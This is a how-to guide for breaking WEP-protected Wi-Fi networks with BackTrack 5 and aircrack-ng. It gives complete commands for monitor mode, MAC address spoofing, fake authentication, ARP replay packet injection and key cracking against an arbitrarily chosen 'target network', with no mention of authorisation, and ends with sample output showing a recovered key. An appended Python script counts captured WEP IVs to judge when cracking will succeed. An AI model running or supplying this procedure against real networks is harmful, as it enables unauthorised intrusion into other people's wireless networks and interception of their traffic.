WEP Cracking
Using BackTrack 5

Download the BackTrack 5 KDE 64-bit ISO:
    http://www.backtrack-linux.org/backtrack/backtrack-5-release/

Create a bootable USB drive with UNetbootin:
    http://unetbootin.sourceforge.net/

Reboot the computer with the USB drive inserted. Make sure the BIOS is set to boot from USB devices before the HDD/optical drive, then boot into BackTrack (an Ubuntu-based live system).

Delete the KDE cache files, otherwise startx may fail to load:
    cd /root/.kde/
    find . -type f -iname "*.kcache" -delete
    startx

Open a new Konsole window. Obtain the name of the wireless network interface (%INTERFACE%):
    airmon-ng

Put the interface into monitor mode and spoof its MAC address. The MAC set here (00:11:22:33:44:55) is the one passed as -h to every aireplay-ng command below, so the two must match:
    airmon-ng stop %INTERFACE%
    ifconfig %INTERFACE% down
    macchanger --mac 00:11:22:33:44:55 %INTERFACE%
    airmon-ng start %INTERFACE%

Note: on BackTrack 5, airmon-ng start usually creates a separate monitor-mode interface (mon0 or similar) and prints its name; use that monitor interface as %INTERFACE% in all of the commands that follow.

Pick a target network. Take note of the access point's human-readable name (%ESSID%), its MAC address (%BSSID%) and its channel (%CHANNEL%):
    airodump-ng %INTERFACE%

Start monitoring the target network, writing captured frames to files prefixed with capturedata:
    airodump-ng -c %CHANNEL% -w capturedata --bssid %BSSID% %INTERFACE%

Open a new Konsole window. Fake-authenticate so that the interface is associated with the access point (the access point only accepts injected frames from an associated client):
    aireplay-ng -1 0 -a %BSSID% -h 00:11:22:33:44:55 -e %ESSID% %INTERFACE%

A successful association looks like:
    18:18:20 Sending Authentication Request
    18:18:20 Authentication successful
    18:18:20 Sending Association Request
    18:18:20 Association successful :-)

If the access point keeps dropping the association, run the fake authentication in keep-alive mode instead: re-associate every 6000 seconds, one packet per authentication, with a keep-alive packet every 10 seconds:
    aireplay-ng -1 6000 -o 1 -q 10 -e %ESSID% -a %BSSID% -h 00:11:22:33:44:55 %INTERFACE%

Open a new Konsole window. Generate traffic with the ARP request replay attack. aireplay-ng waits for an ARP request on the network and replays it to the access point, which retransmits each replay encrypted under a fresh IV; once it has captured an ARP request it injects at upwards of 500 packets per second:
    aireplay-ng -3 -b %BSSID% -h 00:11:22:33:44:55 %INTERFACE%

Continue capturing packets for a while. Roughly 250,000 IVs are needed for a 64-bit WEP key and 1,500,000 IVs for a 128-bit key with the FMS/Korek method (the PTW attack, the default in aircrack-ng 0.9 and later, usually needs far fewer). On a test target the key was recovered after about 1.3M packets had been captured.

After enough packets have been captured, open a new Konsole window and crack the WEP key from the capture files:
    aircrack-ng -b %BSSID% capturedata*.cap

Alternatively, force the FMS/Korek method:
    aircrack-ng -K -b %BSSID% capturedata*.cap

If it is not successful, spend more time capturing packets. A successful attack looks like:
    Aircrack-ng 0.9

    [00:03:06] Tested 674449 keys (got 96610 IVs)

    KB    depth   byte(vote)
     0    0/  9   12(  15) F9( ...
     1    0/  8   34(  61) E8( ...
     2    0/  2   56(  87) A6( ...
     3    1/  5   78(  43) 1A( ...
??? PROFIT!
SSID: firefly
WEP KEY: AF1B08A3E0
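The script below is an added example, not part of the original page and not code from the aircrack-ng suite. It does offline what airodump-ng's #Data column does during the capture step: it walks a pcap file, picks out the WEP-protected 802.11 data frames, and counts unique IVs per BSSID, so a capture can be checked against the 250,000 / 1,500,000 IV rules of thumb before running aircrack-ng. It also flags IVs of the classic FMS weak form (A+3, 0xFF, X). The helper names (iter_pcap, wep_iv, is_fms_weak, count_ivs, build_sample_capture), the BSSIDs and the capture it parses are all made up for this example; on a real run you would read capturedata-01.cap from disk instead of calling build_sample_capture().

```python
import struct
from collections import defaultdict

# pcap link-layer types that airodump-ng writes and aircrack-ng reads (LINKTYPE registry values)
LINKTYPE_IEEE802_11 = 105           # raw 802.11 frames
LINKTYPE_IEEE802_11_RADIOTAP = 127  # radiotap header in front of each 802.11 frame


def iter_pcap(data):
    """Yield (linktype, frame) for every record of a classic pcap file, either byte order."""
    if data[:4] == b"\xd4\xc3\xb2\xa1":
        e = "<"
    elif data[:4] == b"\xa1\xb2\xc3\xd4":
        e = ">"
    else:
        raise ValueError("not a pcap file (bad magic)")
    linktype = struct.unpack(e + "I", data[20:24])[0]
    off = 24
    while off + 16 <= len(data):
        _sec, _usec, incl_len, _orig = struct.unpack(e + "IIII", data[off:off + 16])
        off += 16
        yield linktype, data[off:off + incl_len]
        off += incl_len


def wep_iv(frame):
    """Return (bssid, iv, key_index) for a WEP-protected 802.11 data frame, else None."""
    if len(frame) < 28:
        return None
    fc, flags = frame[0], frame[1]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 2 or not flags & 0x40:          # must be a data frame with the Protected bit set
        return None
    to_ds, from_ds = flags & 0x1, flags & 0x2
    if to_ds and from_ds:                        # 4-address WDS frame: no single BSSID, skip it
        return None
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    bssid = addr1 if to_ds else addr2 if from_ds else addr3
    hdr_len = 26 if subtype & 0x8 else 24        # QoS data frames carry a 2-byte QoS control field
    body = frame[hdr_len:]
    if len(body) < 4 or body[3] & 0x20:          # ExtIV bit set means TKIP/CCMP, not WEP
        return None
    return bssid, body[:3], body[3] >> 6


def is_fms_weak(iv):
    """Classic FMS weak IV of the form (A+3, 0xFF, X), which leaks key byte A (A = 0..12)."""
    return iv[1] == 0xFF and 3 <= iv[0] <= 15


def count_ivs(pcap_bytes):
    """Per-BSSID WEP statistics: data frames seen, unique IVs, and unique FMS-weak IVs."""
    stats = defaultdict(lambda: {"frames": 0, "ivs": set(), "weak_ivs": 0})
    for linktype, frame in iter_pcap(pcap_bytes):
        if linktype == LINKTYPE_IEEE802_11_RADIOTAP:
            frame = frame[struct.unpack_from("<H", frame, 2)[0]:]   # radiotap length is little-endian
        elif linktype != LINKTYPE_IEEE802_11:
            continue
        hit = wep_iv(frame)
        if hit is None:
            continue
        bssid, iv, _key_index = hit
        st = stats[":".join("%02X" % b for b in bssid)]
        st["frames"] += 1
        if iv not in st["ivs"]:                  # a repeated IV is another frame, not another IV
            st["ivs"].add(iv)
            st["weak_ivs"] += int(is_fms_weak(iv))
    return {k: {"frames": v["frames"], "unique_ivs": len(v["ivs"]), "weak_ivs": v["weak_ivs"]}
            for k, v in stats.items()}


# --- constructed sample capture (made-up addresses, not real traffic) --------------------------
AP_A = bytes.fromhex("001122AABBCC")
AP_B = bytes.fromhex("0011226655DD")
STA = bytes.fromhex("001122334455")    # the spoofed client MAC used in the procedure above


def wep_frame(bssid, iv, key_index=0, ext_iv=False):
    """Minimal FromDS data frame AP -> STA: 24-byte header, IV, key-id byte, 36 body bytes, 4-byte ICV."""
    hdr = bytes([0x08, 0x42]) + b"\x00\x00" + STA + bssid + bssid + b"\x00\x00"
    return hdr + iv + bytes([(key_index << 6) | (0x20 if ext_iv else 0)]) + b"\x00" * 40


def build_sample_capture(radiotap=False):
    """Four WEP frames from AP_A (one IV repeated, one FMS-weak), one from AP_B, three frames to ignore."""
    frames = [
        wep_frame(AP_A, b"\x01\x02\x03"),
        wep_frame(AP_A, b"\x04\xff\x00"),                # FMS-weak: first byte 4 -> key byte 1
        wep_frame(AP_A, b"\x01\x02\x03"),                # repeated IV
        wep_frame(AP_A, b"\x10\x20\x30"),
        wep_frame(AP_B, b"\x00\x00\x01"),
        wep_frame(AP_A, b"\x00\x00\x00", ext_iv=True),   # TKIP-style ExtIV bit set: not WEP
        bytes([0x80, 0x00]) + b"\x00\x00" + b"\xff" * 6 + AP_A + AP_A + b"\x00" * 22,  # beacon
        bytes([0x08, 0x02]) + b"\x00\x00" + STA + AP_A + AP_A + b"\x00" * 42,          # unencrypted data
    ]
    if radiotap:
        frames = [b"\x00\x00\x08\x00\x00\x00\x00\x00" + f for f in frames]   # 8-byte radiotap, no fields
    linktype = LINKTYPE_IEEE802_11_RADIOTAP if radiotap else LINKTYPE_IEEE802_11
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1000 + i, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    for bssid, st in sorted(count_ivs(build_sample_capture()).items()):
        print("%s  frames=%d  unique IVs=%d  FMS-weak IVs=%d"
              % (bssid, st["frames"], st["unique_ivs"], st["weak_ivs"]))
```

The count that matters for cracking is unique IVs per BSSID, not frames: the ARP replay attack produces many frames, but each one only helps if the access point encrypted it under an IV not seen before, which is why the script de-duplicates before counting and why repeated IVs are counted as frames only. TKIP and CCMP frames share the same first four body bytes as WEP but set the ExtIV bit, so they are excluded rather than miscounted.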